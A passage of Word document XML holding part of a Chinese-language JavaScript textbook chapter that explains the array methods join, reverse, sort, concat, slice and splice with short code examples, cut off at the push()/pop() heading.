      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.join("");//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"123"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var b=new Array(10);//</w:t>
      </w:r>
      <w:r>
        <w:t>长度为</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>的空数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b.join('-')//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>'---------':9</w:t>
      </w:r>
      <w:r>
        <w:t>个连字号组成的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.join()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是</w:t>
      </w:r>
      <w:r>
        <w:t>String.split()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的逆向操作，后者是将字符串分割成若干块来创建一个数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="7_8_2_reverse__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>reverse()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.</w:t>
      </w:r>
      <w:r>
        <w:t>reverse()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将数组中的元素颠倒顺序，返回逆序的数组。它采取了替换；换句话说，它不通过重新排列的元素创建新的数组，而是在原先的数组中重新排列它们。例如，下面的代码使用</w:t>
      </w:r>
      <w:r>
        <w:t>reverse()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>join()</w:t>
      </w:r>
      <w:r>
        <w:t>方法生成字符串</w:t>
      </w:r>
      <w:r>
        <w:t>“3</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>1”</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.reverse().join()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"3,2,1",</w:t>
      </w:r>
      <w:r>
        <w:t>并且现在的</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>[3,2,1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="7_8_3_sort__"/>
      <w:r>
        <w:t>7.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>sort()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.sort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将数组中的元素排序并返回排序后的数组。当不带参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>sort()</w:t>
      </w:r>
      <w:r>
        <w:t>时，数组元素以字母表顺序排序（如有必要将临时转化为字符串进行比较）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=new Array("banana","cherry","apple");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.sort();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=a.join(",");//s=="apple,banana,cherry"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果数组包含</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>元素，它们会被排到数组的尾部。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>为了按照其他方式而非字母表顺序进行数组排序，必须给</w:t>
      </w:r>
      <w:r>
        <w:t>sort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传递一个比较函数。该</w:t>
      </w:r>
      <w:r>
        <w:t>函数决定了它的两个参数在排好序的数组中的先后顺序。假设第一个参数应该在前，比较函数应该返回一个小于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的数值。反之，假设第一个参数应该在后，函数应该返回一个大于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的数值。并且，假设两个值相等（也就是说，它们的顺序无关紧要），函数应该返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。因此，例如，用数值大小而非字母表顺序进行数组排序，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[33,4,1111,222];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.sort();//</w:t>
      </w:r>
      <w:r>
        <w:t>字母表顺序</w:t>
      </w:r>
      <w:r>
        <w:t>:1111,222,33,4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.sort(function(a,b){//</w:t>
      </w:r>
      <w:r>
        <w:t>数值顺序</w:t>
      </w:r>
      <w:r>
        <w:t>:4,33,222,1111</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return a-</w:t>
      </w:r>
      <w:r>
        <w:t>b;//</w:t>
      </w:r>
      <w:r>
        <w:t>根据顺序，返回负数、</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>、正数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.sort(function(a,b){return b-a});//</w:t>
      </w:r>
      <w:r>
        <w:t>数值大小相反的顺序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，这里使用匿名函数表达式非常方便。既然比较函数只使用一次，就没必要给它们命名了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另外一个数组元素排序的例子，也许需要对一个字符串数组执行不区分大小写的字母表排序，比较函数首先将参数都转化为小写字符串（使用</w:t>
      </w:r>
      <w:r>
        <w:t>toLowerCase()</w:t>
      </w:r>
      <w:r>
        <w:t>方法），再开始比较：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=['ant','Bug','cat','Dog']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.sort();//</w:t>
      </w:r>
      <w:r>
        <w:t>区分大小写的排序：</w:t>
      </w:r>
      <w:r>
        <w:t>['Bug','</w:t>
      </w:r>
      <w:r>
        <w:t>Dog','ant',cat']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>a.sort(function(s,t){//</w:t>
      </w:r>
      <w:r>
        <w:t>不区分大小写的排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=s.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var b=t.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>b)return-1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>b)return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>['ant','Bug','cat','Dog']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="7_8_4_concat__"/>
      <w:r>
        <w:t>7.8.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.concat()</w:t>
      </w:r>
      <w:r>
        <w:t>方法创建并返回一个新数组，它的元素包括调用</w:t>
      </w:r>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t>的原始数组的元素和</w:t>
      </w:r>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t>的每个参数。如果这些参数中的任何一个自身是数组，则连接的是数组的元素，而非数组本身。但要注意，</w:t>
      </w:r>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t>不会递归扁平化数组的数组。</w:t>
      </w:r>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t>也不会修改调用的数组。下面有一些示例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.concat(4,5)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3,4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.concat([4,5]);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3,4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.concat([4,5],[6,7])//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3,4,5,6,7]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.concat(4,[5,[6,7]])//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3,4,5,[6,7]]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="7_8_5_slice__"/>
      <w:r>
        <w:t>7.8.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.slice()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回指定数组的一个片段或子数组。它的两个参数分别指定了片段的开始和结束的位置。返回的数组包含第</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个参数指定的位置和所有到但不含第二个参数指定的位置之间的所有数组元素。如果只指定一个参数，返回的数组将包含从开始位置到数组结尾的所有元素。如参数中出现负数，它表示相对于数组中最后一个元素的位置。例如，参数</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>指定了最后一个元素，而</w:t>
      </w:r>
      <w:r>
        <w:t>-3</w:t>
      </w:r>
      <w:r>
        <w:t>指定了倒数第三个元素。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>不会修改调用的数组。下面有一些示例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3,4,5];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.slice(0,3);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.slice(3);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.slice(1,-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[2,3,4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.slice(-3,-2);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[3]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="7_8_6_splice__"/>
      <w:r>
        <w:t>7.8.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.splice()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是在数组中插入或删除元素的通用方法。不同于</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>会修改调用的数组。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>拥有非常相似的名字，但它们的功能却有本质的区别。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>能够从数组中删除元素、插入元素到数组中或者同时完成这两种操作。在插入或删除点之后的数组元素会根据需要增加或减小它们的索引值，因此数组的其他部分仍然保持连续的。</w:t>
      </w:r>
      <w:r>
        <w:t>spli</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ce()</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个参数指定了插入和（或）删除的起始位置。第二个参数指定了应该从数组中删除的元素的个数。</w:t>
      </w:r>
      <w:r>
        <w:t>如果省略第二个参数，从起始点开始到数组结尾的所有元素都将被删除。</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个由删除元素组成的数组，或者如果没有删除元素就返回一个空数组。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3,4,5,6,7,8];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.splice(4);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[5,6,7,8];a</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3,4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.splice(1,2);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[2,3];a</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>[1,4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.splice(1,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[4];a</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>的前两个参数指定了需要删除的数组元素。紧随其后的任意个数的参数指定了需要插入到数组中的元素，从第一个参数指定的位置开始插入。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3,4,5];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.splice(2,0,'a','b');//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[];a</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,'a','b',3,4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.splice(2,2,[1,2],3);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>['a','b'];a</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,[1,2],3,3,4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，区别于</w:t>
      </w:r>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>会插入数组本身而非数组的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="7_8_7_push__He_pop__"/>
      <w:r>
        <w:t>7.8.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>push()</w:t>
